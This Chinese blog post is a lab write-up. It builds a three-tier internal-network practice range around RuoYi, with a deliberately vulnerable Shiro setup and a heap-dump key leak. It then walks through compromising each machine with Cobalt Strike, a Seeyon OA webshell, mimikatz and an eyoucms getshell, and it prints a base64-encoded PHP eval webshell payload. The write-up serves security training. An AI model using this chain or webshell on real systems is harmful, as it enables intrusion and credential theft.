靶场学习 – 自建三层内网靶场

自建内网靶场

靶场学习 - 自建三层内网靶场

https://github.com/yangzongzhuan/RuoYi/releases

靶场学习 - 自建三层内网靶场

ruoyi-admintargetclassesapplication-druid.yml

修改数据库账号密码

靶场学习 - 自建三层内网靶场

idea 编译生成适配环境的 jar 包

数据库配置推荐:mysql5+、jdk1.8

新建数据库 ry,导入 sql 目录的两个 sql 文件

靶场学习 - 自建三层内网靶场
靶场学习 - 自建三层内网靶场

成功运行

靶场学习 - 自建三层内网靶场

检索 cipherKey 替换 key

靶场学习 - 自建三层内网靶场

除此以外,为了搭建存在的漏洞环境,还需要在 pom.xml 修改 shiro 的版本为有漏洞的版本

生成 heapdump

C:Program FilesJavajdk1.8.0_301bin>jmap -dump:file=C:UsersPublicheapdump <pid>

靶场学习 - 自建三层内网靶场

这样 heapdump 中便带有了 shiro 的 key

靶场学习 - 自建三层内网靶场

入口机器

80 端口为若依系统,8081 端口为 tomcat 管理界面

若依使用的是 4.6 的版本,存在前台 shiro 漏洞利用,但是 key 被修改了

靶场学习 - 自建三层内网靶场

对 8081 端口 tomcat 页面进行目录扫描,发现存在 heapdump

靶场学习 - 自建三层内网靶场

使用工具进行利用,发现泄露的 shiro key

靶场学习 - 自建三层内网靶场

利用的时候记得勾选 AES GCM 不然会利用不成功

靶场学习 - 自建三层内网靶场

内存马连接后上线 cs

靶场学习 - 自建三层内网靶场

对内网资产进行扫描

靶场学习 - 自建三层内网靶场

第二台机器

访问 192.168.1.3:81 发现是致远 oa

靶场学习 - 自建三层内网靶场

使用历史漏洞 ajax.do 成功写入 webshell

靶场学习 - 自建三层内网靶场

使用天蝎进行连接

靶场学习 - 自建三层内网靶场

使用 cs 建立 smb 隧道,生成正向 beacon 到致远机器上运行

靶场学习 - 自建三层内网靶场

或者通过 tcp 回连

靶场学习 - 自建三层内网靶场

mimikatz 抓取密码,发现存在 zzz 账户

靶场学习 - 自建三层内网靶场

登录 zzz 账户,在桌面上发现第二个 flag

靶场学习 - 自建三层内网靶场

第三台机器

并且通过浏览器记录发现其曾访问过 http://192.168.2.3/,并保存了密码,指纹识别为 eyoucms

eyoucms1.5.5 存在后台 getshell 漏洞,尝试进行利用

靶场学习 - 自建三层内网靶场
靶场学习 - 自建三层内网靶场
靶场学习 - 自建三层内网靶场

写入 webshell,连接成功后拿到第三个 flag

<?=file_put_contents("./sx1.php",base64_decode("PD9waHAKZXZhbCgkX1BPU1RbInBhc3MiXSk7"));

靶场学习 - 自建三层内网靶场
靶场学习 - 自建三层内网靶场
© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容